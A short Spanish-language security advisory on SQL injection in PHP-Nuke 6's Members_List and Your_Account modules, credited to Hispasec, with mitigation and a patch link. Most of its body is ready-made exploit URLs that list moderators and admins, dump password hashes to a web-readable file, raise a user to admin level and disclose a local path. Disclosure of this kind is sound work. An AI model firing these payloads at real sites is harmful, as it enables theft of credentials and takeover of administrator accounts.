Problema de inyección de código SQL en PHPNuke
PHP-Nuke 6, el sistema de publicación basado en PHP muy popular entre los portales de Internet, es vulnerable a varios ataques de inyección de código que permitiría el acceso a datos sensibles y/o la manipulación de la base de datos. La vulnerabilidad está causada por un error de validación de entrada en los módulos «Members_List» y «Your_Account» y será únicamente explotable cuando php esté configurado con «magic_quotes_gpc=OFF» (normalmente en php.ini).Formas de explotar la vulnerabilidad según Hispasec
* Listado de moderadores:
http://[victima]/modules.php?name=Members_List&letter=’%20OR%20user_level=’2’/*
* Listado de administradores:
http://[victima]/modules.php?name=Members_List&letter=’%20OR%20user_level=’4’/*
* Creación de un archivo con todas los claves encriptadas:
http://[victima]/modules.php?name=Your_Account&op=mailpasswd&uname=’)%20OR%201=1%20INTO%20OUTFILE%20’/[directorio]/Claves.txt’/*
http://[victima]/Claves.txt
* Elevación de privilegios:
http://[victima]/modules.php?name=Your_Account&op=savehome&broadcast=’,user_level=’4&uid=[NUESTRO_UID]
* Revelación de directorio local:
http://[victima]/modules/Forums/bb_smilies.php
La solución más rápida a esta vulnerabilidad pasa pro editar el fichero php.ini y activar la opción «magic_quotes_gpc=ON». Por otro lado ya estan disponible los parches de actualización y corrección en: http://www.phpnuke.org/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=342&ttitle=Security_Fixes_for_PHP-Nuke_6.0